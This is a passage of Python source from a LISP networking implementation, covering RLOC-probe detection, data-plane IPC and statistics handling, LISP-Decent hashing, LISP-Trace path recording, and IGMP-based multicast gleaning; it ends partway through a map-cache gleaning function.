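# Lookup-order sketch (addresses hypothetical): for addr 1.1.1.1 and
# port 4341 this tries "1.1.1.1:4341", then "1.1.1.1", then any
# "1.1.1.1:<other-port>" entry, caching that last match under the
# plain "1.1.1.1" key for future lookups.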

def lisp_build_crypto_decap_lookup_key(addr, port):
    addr = addr.print_address_no_iid()
    addr_and_port = addr + ":" + str(port)

    if (lisp_i_am_rtr):
        if (addr in lisp_rloc_probe_list): return(addr)

        #
        # Use addr:port only when the xTR is behind a NAT.
        #
        for nat_info in list(lisp_nat_state_info.values()):
            for info in nat_info:
                if (addr == info.address): return(addr_and_port)
        return(addr)
    return(addr_and_port)

def lisp_set_ttl(lisp_socket, ttl):
    try:
        lisp_socket.setsockopt(socket.SOL_IP, socket.IP_TTL, ttl)
        lisp_socket.setsockopt(socket.SOL_IP, socket.IP_MULTICAST_TTL, ttl)
    except:
        lprint("socket.setsockopt(IP_TTL) not supported")
    return

def lisp_is_rloc_probe_request(lisp_type):
    lisp_type = struct.unpack("B", lisp_type)[0]
    return(lisp_type == 0x12)

def lisp_is_rloc_probe_reply(lisp_type):
    lisp_type = struct.unpack("B", lisp_type)[0]
    return(lisp_type == 0x28)

def lisp_is_rloc_probe(packet, rr):
    udp = (struct.unpack("B", packet[9:10])[0] == 17)
    if (udp == False): return([packet, None, None, None])

    sport = struct.unpack("H", packet[20:22])[0]
    dport = struct.unpack("H", packet[22:24])[0]
    is_lisp_port = (socket.htons(LISP_CTRL_PORT) in [sport, dport])
    if (is_lisp_port == False): return([packet, None, None, None])

    #
    # rr is 0 to test for a Map-Request probe, 1 for a Map-Reply probe,
    # and -1 to accept either.
    #
    if (rr == 0):
        probe = lisp_is_rloc_probe_request(packet[28:29])
        if (probe == False): return([packet, None, None, None])
    elif (rr == 1):
        probe = lisp_is_rloc_probe_reply(packet[28:29])
        if (probe == False): return([packet, None, None, None])
    elif (rr == -1):
        probe = lisp_is_rloc_probe_request(packet[28:29])
        if (probe == False):
            probe = lisp_is_rloc_probe_reply(packet[28:29])
            if (probe == False): return([packet, None, None, None])

    #
    # Get the source address of the probe.
    #
    source = lisp_address(LISP_AFI_IPV4, "", 32, 0)
    source.address = socket.ntohl(struct.unpack("I", packet[12:16])[0])

    #
    # Probe sourced by this system, drop.
    #
    if (source.is_local()): return([None, None, None, None])

    source_str = source.print_address_no_iid()
    port = socket.ntohs(struct.unpack("H", packet[20:22])[0])
    ttl = struct.unpack("B", packet[8:9])[0] - 1
    packet = packet[28::]

    r = bold("Receive(pcap)", False)
    f = bold("from " + source_str, False)
    p = lisp_format_packet(packet)
    lprint("{} {} bytes {} {}, packet: {}".format(r, len(packet), f, port, p))

    return([packet, source_str, port, ttl])
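
# Return-value sketch: [packet, None, None, None] passes a non-probe
# packet through untouched; [None, None, None, None] drops a locally
# sourced probe; otherwise the caller receives the LISP payload plus
# [payload, source-RLOC-string, source-port, decremented-TTL].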

def lisp_ipc_write_xtr_parameters(cp, dp):
    if (lisp_ipc_dp_socket == None): return

    entry = { "type" : "xtr-parameters", "control-plane-logging" : cp,
        "data-plane-logging" : dp, "rtr" : lisp_i_am_rtr }

    lisp_write_to_dp_socket(entry)
    return

def lisp_external_data_plane():
    #
    # An external data-plane is in use when "ipc-data-plane = yes" is
    # configured or the LISP_RUN_LISP_XTR environment variable is set.
    #
    cmd = 'egrep "ipc-data-plane = yes" ./lisp.config'
    if (getoutput(cmd) != ""): return(True)

    if (os.getenv("LISP_RUN_LISP_XTR") != None): return(True)
    return(False)

def lisp_process_data_plane_restart(do_clear=False):
    os.system("touch ./lisp.config")

    jdata = { "type" : "entire-map-cache", "entries" : [] }

    if (do_clear == False):
        entries = jdata["entries"]
        lisp_map_cache.walk_cache(lisp_ipc_walk_map_cache, entries)

    lisp_write_to_dp_socket(jdata)
    return

def lisp_process_data_plane_stats(msg, lisp_sockets, lisp_port):
    if ("entries" not in msg):
        lprint("No 'entries' in stats IPC message")
        return
    if (type(msg["entries"]) != list):
        lprint("'entries' in stats IPC message must be an array")
        return

    for entry in msg["entries"]:
        if ("eid-prefix" not in entry):
            lprint("No 'eid-prefix' in stats IPC message")
            continue
        eid_str = entry["eid-prefix"]

        if ("instance-id" not in entry):
            lprint("No 'instance-id' in stats IPC message")
            continue
        iid = int(entry["instance-id"])

        #
        # Look up EID-prefix in map-cache.
        #
        eid = lisp_address(LISP_AFI_NONE, "", 0, iid)
        eid.store_prefix(eid_str)
        mc = lisp_map_cache_lookup(None, eid)
        if (mc == None):
            lprint("Map-cache entry for {} not found for stats update".
                format(eid_str))
            continue

        if ("rlocs" not in entry):
            lprint("No 'rlocs' in stats IPC message for {}".format(eid_str))
            continue
        if (type(entry["rlocs"]) != list):
            lprint("'rlocs' in stats IPC message must be an array")
            continue
        ipc_rlocs = entry["rlocs"]

        #
        # Loop through the RLOCs in the IPC message and add the counters
        # to the matching map-cache RLOC entries.
        #
        for ipc_rloc in ipc_rlocs:
            if ("rloc" not in ipc_rloc): continue

            rloc_str = ipc_rloc["rloc"]
            if (rloc_str == "no-address"): continue

            rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
            rloc.store_address(rloc_str)

            rloc_entry = mc.get_rloc(rloc)
            if (rloc_entry == None): continue

            pc = 0 if ("packet-count" not in ipc_rloc) else \
                ipc_rloc["packet-count"]
            bc = 0 if ("byte-count" not in ipc_rloc) else \
                ipc_rloc["byte-count"]
            ts = 0 if ("seconds-last-packet" not in ipc_rloc) else \
                ipc_rloc["seconds-last-packet"]

            rloc_entry.stats.packet_count += pc
            rloc_entry.stats.byte_count += bc
            rloc_entry.stats.last_increment = lisp_get_timestamp() - ts

            lprint("Update stats {}/{}/{}s for {} RLOC {}".format(pc, bc,
                ts, eid_str, rloc_str))

        #
        # Refresh the map-cache entry if its TTL has elapsed.
        #
        if (mc.group.is_null() and mc.has_ttl_elapsed()):
            eid_str = green(mc.print_eid_tuple(), False)
            lprint("Refresh map-cache entry {}".format(eid_str))
            lisp_send_map_request(lisp_sockets, lisp_port, None, mc.eid, None)

    return
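
# Hedged example of a stats IPC message this function accepts (values
# hypothetical):
#
#   { "type" : "statistics", "entries" : [
#       { "eid-prefix" : "10.0.0.0/8", "instance-id" : "0",
#         "rlocs" : [ { "rloc" : "1.1.1.1", "packet-count" : 10,
#                       "byte-count" : 8000,
#                       "seconds-last-packet" : 2 } ] } ] }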

def lisp_process_data_plane_decap_stats(msg, lisp_ipc_socket):
    #
    # The lisp-itr process relays the message to the lisp-etr process,
    # which owns the decap counters.
    #
    if (lisp_i_am_itr):
        lprint("Send decap-stats IPC message to lisp-etr process")
        ipc = "stats%{}".format(json.dumps(msg))
        ipc = lisp_command_ipc(ipc, "lisp-itr")
        lisp_ipc(ipc, lisp_ipc_socket, "lisp-etr")
        return

    #
    # Process the decap-stats message in the ETR.
    #
    ipc = bold("IPC", False)
    lprint("Process decap-stats {} message: '{}'".format(ipc, msg))

    if (lisp_i_am_etr): msg = json.loads(msg)

    key_names = ["good-packets", "ICV-error", "checksum-error",
        "lisp-header-error", "no-decrypt-key", "bad-inner-version",
        "outer-header-error"]

    for key_name in key_names:
        pc = 0 if (key_name not in msg) else msg[key_name]["packet-count"]
        lisp_decap_stats[key_name].packet_count += pc

        bc = 0 if (key_name not in msg) else msg[key_name]["byte-count"]
        lisp_decap_stats[key_name].byte_count += bc

        ts = 0 if (key_name not in msg) else \
            msg[key_name]["seconds-last-packet"]
        lisp_decap_stats[key_name].last_increment = lisp_get_timestamp() - ts

    return
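
# Hedged example of a decap-stats message body (counters hypothetical);
# each key updates the matching lisp_decap_stats entry:
#
#   { "good-packets" : { "packet-count" : 100, "byte-count" : 90000,
#                        "seconds-last-packet" : 1 },
#     "ICV-error"    : { "packet-count" : 2, "byte-count" : 120,
#                        "seconds-last-packet" : 30 } }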

def lisp_process_punt(punt_socket, lisp_send_sockets, lisp_ephem_port):
    message, source = punt_socket.recvfrom(4000)

    msg = json.loads(message)
    if (type(msg) != dict):
        lprint("Invalid punt message from {}, not in JSON format".
            format(source))
        return

    punt = bold("Punt", False)
    lprint("{} message from '{}': '{}'".format(punt, source, msg))

    if ("type" not in msg):
        lprint("Punt IPC message has no 'type' key")
        return

    #
    # Dispatch statistics and restart messages.
    #
    if (msg["type"] == "statistics"):
        lisp_process_data_plane_stats(msg, lisp_send_sockets,
            lisp_ephem_port)
        return
    if (msg["type"] == "decap-statistics"):
        lisp_process_data_plane_decap_stats(msg, punt_socket)
        return
    if (msg["type"] == "restart"):
        lisp_process_data_plane_restart()
        return

    #
    # Otherwise this must be a discovery message.
    #
    if (msg["type"] != "discovery"):
        lprint("Punt IPC message has wrong format")
        return
    if ("interface" not in msg):
        lprint("Invalid punt message from {}, required keys missing".
            format(source))
        return

    #
    # Get instance-ID for the receiving interface.
    #
    device = msg["interface"]
    if (device == ""):
        iid = int(msg["instance-id"])
        if (iid == -1): return
    else:
        iid = lisp_get_interface_instance_id(device, None)

    #
    # Validate source-EID, if supplied.
    #
    seid = None
    if ("source-eid" in msg):
        source_eid = msg["source-eid"]
        seid = lisp_address(LISP_AFI_NONE, source_eid, 0, iid)
        if (seid.is_null()):
            lprint("Invalid source-EID format '{}'".format(source_eid))
            return

    #
    # Validate dest-EID, if supplied.
    #
    deid = None
    if ("dest-eid" in msg):
        dest_eid = msg["dest-eid"]
        deid = lisp_address(LISP_AFI_NONE, dest_eid, 0, iid)
        if (deid.is_null()):
            lprint("Invalid dest-EID format '{}'".format(dest_eid))
            return

    #
    # Do source-EID discovery when the EID matches a dynamic-EID
    # database-mapping.
    #
    if (seid):
        e = green(seid.print_address(), False)
        db = lisp_db_for_lookups.lookup_cache(seid, False)
        if (db != None):
            if (db.dynamic_eid_configured()):
                interface = lisp_allow_dynamic_eid(device, seid)
                if (interface != None and lisp_i_am_itr):
                    # Pass the punt socket so the lisp-etr process can
                    # be told about the learned EID.
                    lisp_itr_discover_eid(db, seid, device, interface,
                        punt_socket)
                else:
                    lprint(("Disallow dynamic source-EID {} " + \
                        "on interface {}").format(e, device))
        else:
            lprint("Punt from non-EID source {}".format(e))

    #
    # Send a Map-Request for the dest-EID unless a usable map-cache
    # entry already exists.
    #
    if (deid):
        mc = lisp_map_cache_lookup(seid, deid)
        if (mc == None or lisp_mr_or_pubsub(mc.action)):
            if (lisp_rate_limit_map_request(deid)): return

            pubsub = (mc and mc.action == LISP_SEND_PUBSUB_ACTION)
            lisp_send_map_request(lisp_send_sockets, lisp_ephem_port,
                seid, deid, None, pubsub)
        else:
            e = green(deid.print_address(), False)
            lprint("Map-cache entry for {} already exists".format(e))

    return

def lisp_ipc_map_cache_entry(mc, jdata):
    entry = lisp_write_ipc_map_cache(True, mc, dont_send=True)
    jdata.append(entry)
    return([True, jdata])

def lisp_ipc_walk_map_cache(mc, jdata):
    #
    # There is only destination state in this map-cache entry.
    #
    if (mc.group.is_null()): return(lisp_ipc_map_cache_entry(mc, jdata))

    if (mc.source_cache == None): return([True, jdata])

    #
    # There is (source, group) state, so walk all sources for this
    # group entry.
    #
    jdata = mc.source_cache.walk_cache(lisp_ipc_map_cache_entry, jdata)
    return([True, jdata])

def lisp_itr_discover_eid(db, eid, input_interface, routed_interface,
    lisp_ipc_listen_socket):
    eid_str = eid.print_address()
    if (eid_str in db.dynamic_eids):
        db.dynamic_eids[eid_str].last_packet = lisp_get_timestamp()
        return

    #
    # Add dynamic-EID state to the database-mapping entry.
    #
    dyn_eid = lisp_dynamic_eid()
    dyn_eid.dynamic_eid.copy_address(eid)
    dyn_eid.interface = routed_interface
    dyn_eid.last_packet = lisp_get_timestamp()
    dyn_eid.get_timeout(routed_interface)
    db.dynamic_eids[eid_str] = dyn_eid

    routed = ""
    if (input_interface != routed_interface):
        routed = ", routed-interface " + routed_interface

    eid_string = green(eid_str, False) + bold(" discovered", False)
    lprint("Dynamic-EID {} on interface {}{}, timeout {}".format(eid_string,
        input_interface, routed, dyn_eid.timeout))

    #
    # Tell the lisp-etr process so it can register the dynamic-EID.
    #
    ipc = "learn%{}%{}".format(eid_str, routed_interface)
    ipc = lisp_command_ipc(ipc, "lisp-itr")
    lisp_ipc(ipc, lisp_ipc_listen_socket, "lisp-etr")
    return

def lisp_retry_decap_keys(addr_str, packet, iv, packet_icv):
    if (lisp_search_decap_keys == False): return

    #
    # Only retry for keys stored by address alone (no port).
    #
    if (addr_str.find(":") != -1): return

    current_keys = lisp_crypto_keys_by_rloc_decap[addr_str]

    for key in lisp_crypto_keys_by_rloc_decap:
        #
        # Only consider entries for the same address.
        #
        if (key.find(addr_str) == -1): continue

        #
        # Skip the entry we already tried.
        #
        if (key == addr_str): continue

        #
        # Skip entries that hold the same key material.
        #
        keys = lisp_crypto_keys_by_rloc_decap[key]
        if (keys == current_keys): continue

        #
        # Run the ICV check with the candidate key.
        #
        crypto_key = keys[1]
        if (packet_icv != crypto_key.do_icv(packet, iv)):
            lprint("Test ICV with key {} failed".format(red(key, False)))
            continue

        lprint("Changing decap crypto key to {}".format(red(key, False)))
        lisp_crypto_keys_by_rloc_decap[addr_str] = keys

    return

def lisp_decent_pull_xtr_configured():
    return(lisp_decent_modulus != 0 and lisp_decent_dns_suffix != None)

def lisp_is_decent_dns_suffix(dns_name):
    if (lisp_decent_dns_suffix == None): return(False)
    name = dns_name.split(".")
    name = ".".join(name[1::])
    return(name == lisp_decent_dns_suffix)
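
# Example (suffix hypothetical): with lisp_decent_dns_suffix set to
# "lisp-decent.net", the name "17.lisp-decent.net" matches, since
# everything after the first label is compared, while "17.example.net"
# does not.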

def lisp_get_decent_index(eid):
    eid_str = eid.print_prefix()
    hash_value = hmac.new(b"lisp-decent", eid_str, hashlib.sha256).hexdigest()

    #
    # The hash width is configurable via LISP_DECENT_HASH_WIDTH, given
    # in bytes (so doubled to count hex nibbles); the default is 12
    # nibbles and anything wider than 32 bytes falls back to it.
    #
    hash_width = os.getenv("LISP_DECENT_HASH_WIDTH")
    if (hash_width in ["", None]):
        hash_width = 12
    else:
        hash_width = int(hash_width)
        if (hash_width > 32):
            hash_width = 12
        else:
            hash_width *= 2

    hash_str = hash_value[0:hash_width]
    index = int(hash_str, 16) % lisp_decent_modulus

    lprint("LISP-Decent modulus {}, hash-width {}, mod-value {}, index {}".
        format(lisp_decent_modulus, old_div(hash_width, 2), hash_str, index))

    return(index)
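
# Worked example (digest hypothetical): with LISP_DECENT_HASH_WIDTH
# unset, the first 12 hex digits of the HMAC-SHA256 digest are kept, so
# a digest beginning "8f3a12bc9d01..." with lisp_decent_modulus 10
# yields index int("8f3a12bc9d01", 16) % 10.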

def lisp_get_decent_dns_name(eid):
    index = lisp_get_decent_index(eid)
    return(str(index) + "." + lisp_decent_dns_suffix)

def lisp_get_decent_dns_name_from_str(iid, eid_str):
    eid = lisp_address(LISP_AFI_NONE, eid_str, 0, iid)
    index = lisp_get_decent_index(eid)
    return(str(index) + "." + lisp_decent_dns_suffix)
def lisp_trace_append(packet, reason=None, ed="encap", lisp_socket=None,
    rloc_entry=None):

    offset = 28 if packet.inner_version == 4 else 48
    trace_pkt = packet.packet[offset::]
    trace = lisp_trace()
    if (trace.decode(trace_pkt) == False):
        lprint("Could not decode JSON portion of a LISP-Trace packet")
        return(False)
    #endif

    next_rloc = "?" if packet.outer_dest.is_null() else \
        packet.outer_dest.print_address_no_iid()

    #
    # Include the encap port when it is not the standard LISP data port.
    #
    if (next_rloc != "?" and packet.encap_port != LISP_DATA_PORT):
        if (ed == "encap"): next_rloc += ":{}".format(packet.encap_port)
    #endif

    #
    # Build the path entry for this node.
    #
    entry = {}
    entry["n"] = "ITR" if lisp_i_am_itr else "ETR" if lisp_i_am_etr else \
        "RTR" if lisp_i_am_rtr else "?"
    srloc = packet.outer_source
    if (srloc.is_null()): srloc = lisp_myrlocs[0]
    entry["sr"] = srloc.print_address_no_iid()

    #
    # An ITR appends the inner source port so the far end can return the
    # packet to the right translated port.
    #
    if (entry["n"] == "ITR" and packet.inner_sport != LISP_TRACE_PORT):
        entry["sr"] += ":{}".format(packet.inner_sport)
    #endif

    entry["hn"] = lisp_hostname
    ts_key = ed[0] + "ts"
    entry[ts_key] = lisp_get_timestamp()

    #
    # If the destination RLOC is unknown and we are an ETR, get it from the
    # database-mapping.
    #
    if (next_rloc == "?" and entry["n"] == "ETR"):
        db = lisp_db_for_lookups.lookup_cache(packet.inner_dest, False)
        if (db != None and len(db.rloc_set) >= 1):
            next_rloc = db.rloc_set[0].rloc.print_address_no_iid()
        #endif
    #endif
    entry["dr"] = next_rloc

    #
    # Annotate the drop reason when there is no destination RLOC.
    #
    if (next_rloc == "?" and reason != None):
        entry["dr"] += " ({})".format(reason)
    #endif

    #
    # Add recent RLOC-probe telemetry if available.
    #
    if (rloc_entry != None):
        entry["rtts"] = rloc_entry.recent_rloc_probe_rtts
        entry["hops"] = rloc_entry.recent_rloc_probe_hops
        entry["lats"] = rloc_entry.recent_rloc_probe_latencies
    #endif

    #
    # Create the first JSON record if this is the originating node.
    #
    seid = packet.inner_source.print_address()
    deid = packet.inner_dest.print_address()
    if (trace.packet_json == []):
        jd = {}
        jd["se"] = seid
        jd["de"] = deid
        jd["paths"] = []
        trace.packet_json.append(jd)
    #endif

    #
    # Append this node's entry to the record matching the destination EID.
    #
    for jd in trace.packet_json:
        if (jd["de"] != deid): continue
        jd["paths"].append(entry)
        break
    #endfor

    #
    # If we are the destination ETR, add a second record for the return path
    # and remember to swap addresses below.
    #
    swap = False
    if (len(trace.packet_json) == 1 and entry["n"] == "ETR" and
        trace.myeid(packet.inner_dest)):
        jd = {}
        jd["se"] = deid
        jd["de"] = seid
        jd["paths"] = []
        trace.packet_json.append(jd)
        swap = True
    #endif

    trace.print_trace()
    trace_pkt = trace.encode()

    #
    # If the next-hop RLOC is still unknown, return the trace to the sender.
    #
    sender_rloc = trace.packet_json[0]["paths"][0]["sr"]
    if (next_rloc == "?"):
        lprint("LISP-Trace return to sender RLOC {}".format(sender_rloc))
        trace.return_to_sender(lisp_socket, sender_rloc, trace_pkt)
        return(False)
    #endif

    #
    # Fix up the UDP length and zero the checksum (recomputed for IPv6).
    #
    udp_length = trace.packet_length()
    headers = packet.packet[0:offset]
    udp = struct.pack("HH", socket.htons(udp_length), 0)
    headers = headers[0:offset - 4] + udp
    if (packet.inner_version == 6 and entry["n"] == "ETR" and
        len(trace.packet_json) == 2):
        udp_header = headers[offset - 8::] + trace_pkt
        udp_header = lisp_udp_checksum(seid, deid, udp_header)
        headers = headers[0:offset - 8] + udp_header[0:8]
    #endif

    #
    # Swap IP addresses and UDP ports when returning the packet.
    #
    if (swap):
        if (packet.inner_version == 4):
            headers = headers[0:12] + headers[16:20] + headers[12:16] + \
                headers[22:24] + headers[20:22] + headers[24::]
        else:
            headers = headers[0:8] + headers[24:40] + headers[8:24] + \
                headers[42:44] + headers[40:42] + headers[44::]
        #endif

        swap_addr = packet.inner_dest
        packet.inner_dest = packet.inner_source
        packet.inner_source = swap_addr
    #endif

    #
    # Fix up the IP length field.
    #
    offset = 2 if packet.inner_version == 4 else 4
    ip_length = 20 + udp_length if packet.inner_version == 4 else udp_length
    packed = struct.pack("H", socket.htons(ip_length))
    headers = headers[0:offset] + packed + headers[offset + 2::]

    #
    # Zero and recompute the IPv4 header checksum.
    #
    if (packet.inner_version == 4):
        zero = struct.pack("H", 0)
        headers = headers[0:10] + zero + headers[12::]
        packed = lisp_ip_checksum(headers[0:20])
        headers = packed + headers[20::]
    #endif

    packet.packet = headers + trace_pkt
    return(True)

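#
# For reference, an assumed (illustrative, not normative) shape of the JSON
# carried in a LISP-Trace packet after it has crossed an ITR and an ETR:
#
#   [{"se": "[0]10.1.1.1", "de": "[0]10.2.2.2",
#     "paths": [
#       {"n": "ITR", "sr": "192.0.2.1:4341", "hn": "itr1", "ets": <ts>},
#       {"n": "ETR", "sr": "203.0.113.9", "hn": "etr1", "dts": <ts>}]}]
#
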
#
# Returns the 3-tuple (gleaning-allowed?, rloc-probe?, igmp-query?) by
# matching the EID, group, and RLOC against each configured glean-mapping.
#
def lisp_allow_gleaning(eid, group, rloc):
    if (lisp_glean_mappings == []): return(False, False, False)

    for entry in lisp_glean_mappings:
        if ("instance-id" in entry):
            iid = eid.instance_id
            low, high = entry["instance-id"]
            if (iid < low or iid > high): continue
        #endif
        if ("eid-prefix" in entry):
            e = copy.deepcopy(entry["eid-prefix"])
            e.instance_id = eid.instance_id
            if (eid.is_more_specific(e) == False): continue
        #endif
        if ("group-prefix" in entry):
            if (group == None): continue
            g = copy.deepcopy(entry["group-prefix"])
            g.instance_id = group.instance_id
            if (group.is_more_specific(g) == False): continue
        #endif
        if ("rloc-prefix" in entry):
            if (rloc != None and rloc.is_more_specific(entry["rloc-prefix"])
                == False): continue
        #endif
        return(True, entry["rloc-probe"], entry["igmp-query"])
    #endfor
    return(False, False, False)

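#
# An assumed (illustrative) lisp_glean_mappings entry, inferred from the keys
# referenced above:
#
#   {"instance-id": (0, 0), "eid-prefix": <lisp_address>,
#    "group-prefix": <lisp_address>, "rloc-prefix": <lisp_address>,
#    "rloc-probe": True, "igmp-query": True}
#
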
def lisp_build_gleaned_multicast(seid, geid, rloc, port, igmp):
    group_str = geid.print_address()
    seid_name = seid.print_address_no_iid()
    s = green("{}".format(seid_name), False)
    e = green("(*, {})".format(group_str), False)
    r = red(rloc.print_address_no_iid() + ":" + str(port), False)

    #
    # Find or create the (*, G) map-cache entry.
    #
    mc = lisp_map_cache_lookup(seid, geid)
    if (mc == None):
        mc = lisp_mapping("", "", [])
        mc.group.copy_address(geid)
        mc.eid.copy_address(geid)
        mc.eid.address = 0
        mc.eid.mask_len = 0
        mc.mapping_source.copy_address(rloc)
        mc.map_cache_ttl = LISP_IGMP_TTL
        mc.gleaned = True
        mc.add_cache()
        lprint("Add gleaned EID {} to map-cache".format(e))
    #endif

    #
    # Find the RLE node for this source EID, if it already exists.
    #
    rloc_entry = rle = rle_node = None
    if (mc.rloc_set != []):
        rloc_entry = mc.rloc_set[0]
        if (rloc_entry.rle):
            rle = rloc_entry.rle
            for node in rle.rle_nodes:
                if (node.rloc_name != seid_name): continue
                rle_node = node
                break
            #endfor
        #endif
    #endif

    #
    # Create RLOC entry, RLE, and RLE node as needed.
    #
    if (rloc_entry == None):
        rloc_entry = lisp_rloc()
        mc.rloc_set = [rloc_entry]
        rloc_entry.priority = 253
        rloc_entry.mpriority = 255
        mc.build_best_rloc_set()
    #endif
    if (rle == None):
        rle = lisp_rle(geid.print_address())
        rloc_entry.rle = rle
    #endif
    if (rle_node == None):
        rle_node = lisp_rle_node()
        rle_node.rloc_name = seid_name
        rle.rle_nodes.append(rle_node)
        rle.build_forwarding_list()
        lprint("Add RLE {} from {} for gleaned EID {}".format(r, s, e))
    elif (rloc.is_exact_match(rle_node.address) == False or
        port != rle_node.translated_port):
        lprint("Changed RLE {} from {} for gleaned EID {}".format(r, s, e))
    #endif

    #
    # Store the (possibly NAT-translated) RLOC and port.
    #
    rle_node.store_translated_rloc(rloc, port)

    #
    # Track group membership per source EID for IGMP-learned state.
    #
    if (igmp):
        seid_str = seid.print_address()
        if (seid_str not in lisp_gleaned_groups):
            lisp_gleaned_groups[seid_str] = {}
        #endif
        lisp_gleaned_groups[seid_str][group_str] = lisp_get_timestamp()
    #endif

def lisp_remove_gleaned_multicast(seid, geid):

    #
    # Find the gleaned (*, G) map-cache entry and its RLE.
    #
    mc = lisp_map_cache_lookup(seid, geid)
    if (mc == None): return

    rle = mc.rloc_set[0].rle
    if (rle == None): return

    seid_name = seid.print_address_no_iid()
    found = False
    for rle_node in rle.rle_nodes:
        if (rle_node.rloc_name == seid_name):
            found = True
            break
        #endif
    #endfor
    if (found == False): return

    #
    # Remove the RLE node for this source EID and rebuild forwarding state.
    #
    rle.rle_nodes.remove(rle_node)
    rle.build_forwarding_list()

    group_str = geid.print_address()
    seid_str = seid.print_address()
    s = green("{}".format(seid_str), False)
    e = green("(*, {})".format(group_str), False)
    lprint("Gleaned EID {} RLE removed for {}".format(e, s))

    #
    # Forget the group membership for this source EID.
    #
    if (seid_str in lisp_gleaned_groups):
        if (group_str in lisp_gleaned_groups[seid_str]):
            lisp_gleaned_groups[seid_str].pop(group_str)
        #endif
    #endif

    #
    # Delete the map-cache entry when no RLEs remain.
    #
    if (rle.rle_nodes == []):
        mc.delete_cache()
        lprint("Gleaned EID {} remove, no more RLEs".format(e))
    #endif

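#
# lisp_gleaned_groups is assumed (from the usage above) to be a dict of
# dicts keyed as {seid-string: {group-string: join-timestamp}}.
#
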
def lisp_change_gleaned_multicast(seid, rloc, port):
    seid_str = seid.print_address()
    if (seid_str not in lisp_gleaned_groups): return

    for group in lisp_gleaned_groups[seid_str]:
        lisp_geid.store_address(group)
        lisp_build_gleaned_multicast(seid, lisp_geid, rloc, port, False)
    #endfor

igmp_types = {17: "IGMP-query", 18: "IGMPv1-report", 19: "DVMRP",
    20: "PIMv1", 22: "IGMPv2-report", 23: "IGMPv2-leave",
    30: "mtrace-response", 31: "mtrace-request", 34: "IGMPv3-report"}

lisp_igmp_record_types = {1: "include-mode", 2: "exclude-mode",
    3: "change-to-include", 4: "change-to-exclude", 5: "allow-new-source",
    6: "block-old-sources"}

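#
# lisp_process_igmp_packet() below parses the IGMP message that follows the
# IPv4 header. Assumed layout (per RFC 2236 / RFC 3376, simplified to the
# fields the parser actually reads):
#
#   v1/v2:  type (1) | max-resp (1) | checksum (2) | group (4)
#   v3:     type (1) | reserved (1) | checksum (2) | reserved+record-count (4)
#           then per group record: record-type (1) | aux-data-len (1) |
#           source-count (2) | group (4) | source-count x 4-byte sources
#
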
def lisp_process_igmp_packet(packet):

    #
    # Returns True for queries, [] on errors, or a list of entries of the
    # form [source-or-None, group-string, join-boolean].
    #
    source = lisp_address(LISP_AFI_IPV4, "", 32, 0)
    source.address = socket.ntohl(struct.unpack("I", packet[12:16])[0])
    from_str = bold("from {}".format(source.print_address_no_iid()), False)

    r = bold("Receive", False)
    lprint("{} {}-byte {}, IGMP packet: {}".format(r, len(packet), from_str,
        lisp_format_packet(packet)))

    #
    # Jump over the IP header (IHL is in 32-bit words).
    #
    header_offset = (struct.unpack("B", packet[0:1])[0] & 0x0f) * 4

    igmp = packet[header_offset::]
    igmp_type = struct.unpack("B", igmp[0:1])[0]

    #
    # Get the group address from the IGMP header.
    #
    group = lisp_address(LISP_AFI_IPV4, "", 32, 0)
    group.address = socket.ntohl(struct.unpack("II", igmp[:8])[1])
    group_str = group.print_address_no_iid()

    if (igmp_type == 17):
        lprint("IGMP Query for group {}".format(group_str))
        return(True)
    #endif

    supported = (igmp_type in (0x12, 0x16, 0x17, 0x22))
    if (supported == False):
        type_str = "{} ({})".format(igmp_type, igmp_types[igmp_type]) if \
            (igmp_type in igmp_types) else igmp_type
        lprint("IGMP type {} not supported".format(type_str))
        return([])
    #endif

    if (len(igmp) < 8):
        lprint("IGMP message too small")
        return([])
    #endif

    #
    # IGMPv2 leave.
    #
    if (igmp_type == 0x17):
        lprint("IGMPv2 leave (*, {})".format(bold(group_str, False)))
        return([[None, group_str, False]])
    #endif

    #
    # IGMPv1/v2 join, suppressing link-local groups.
    #
    if (igmp_type in (0x12, 0x16)):
        lprint("IGMPv{} join (*, {})".format(1 if (igmp_type == 0x12) else 2,
            bold(group_str, False)))

        if (group_str.find("224.0.0.") != -1):
            lprint("Suppress registration for link-local groups")
        else:
            return([[None, group_str, True]])
        #endif
        return([])
    #endif

    #
    # IGMPv3 report: walk the group records.
    #
    record_count = group.address
    igmp = igmp[8::]

    record_format = "BBHI"
    record_size = struct.calcsize(record_format)
    source_format = "I"
    source_size = struct.calcsize(source_format)
    source = lisp_address(LISP_AFI_IPV4, "", 32, 0)

    register_entries = []
    for i in range(record_count):
        if (len(igmp) < record_size): return
        record_type, aux_len, source_count, group_address = struct.unpack(
            record_format, igmp[:record_size])

        igmp = igmp[record_size::]

        if (record_type not in lisp_igmp_record_types):
            lprint("Invalid record type {}".format(record_type))
            continue
        #endif

        record_type_str = lisp_igmp_record_types[record_type]
        source_count = socket.ntohs(source_count)
        group.address = socket.ntohl(group_address)
        group_str = group.print_address_no_iid()

        lprint("Record type: {}, group: {}, source-count: {}".format(
            record_type_str, group_str, source_count))

        #
        # include-mode and allow-new-source records are joins; exclude-mode
        # records with zero sources (exclude nothing) are also joins.
        #
        joinleave = False
        if (record_type in (1, 5)): joinleave = True
        if (record_type in (2, 4) and source_count == 0): joinleave = True
        action_str = "join" if (joinleave) else "leave"

        if (group_str.find("224.0.0.") != -1):
            lprint("Suppress registration for link-local groups")
            continue
        #endif

        #
        # (*, G) entry when the record carries no sources.
        #
        if (source_count == 0):
            register_entries.append([None, group_str, joinleave])
            lprint("IGMPv3 {} (*, {})".format(bold(action_str, False),
                bold(group_str, False)))
        #endif

        #
        # (S, G) entries, one per listed source.
        #
        for j in range(source_count):
            if (len(igmp) < source_size): return
            address = struct.unpack(source_format, igmp[:source_size])[0]
            source.address = socket.ntohl(address)
            source_str = source.print_address_no_iid()
            register_entries.append([source_str, group_str, joinleave])
            lprint("{} ({}, {})".format(action_str,
                green(source_str, False), bold(group_str, False)))
            igmp = igmp[source_size::]
        #endfor
    #endfor

    return(register_entries)

#
# Scratch lisp_address used by the IGMP gleaning code below.
#
lisp_geid = lisp_address(LISP_AFI_IPV4, "", 32, 0)

def lisp_glean_map_cache(seid, rloc, encap_port, igmp):

    #
    # Check if a gleaned unicast entry already exists and whether the RLOC
    # or encap-port changed.
    #
    rloc_change = True
    mc = lisp_map_cache.lookup_cache(seid, True)
    if (mc and len(mc.rloc_set) != 0):
        mc.last_refresh_time = lisp_get_timestamp()

        cached_rloc = mc.rloc_set[0]
        orloc = cached_rloc.rloc
        oport = cached_rloc.translated_port
        rloc_change = (orloc.is_exact_match(rloc) == False or
            oport != encap_port)

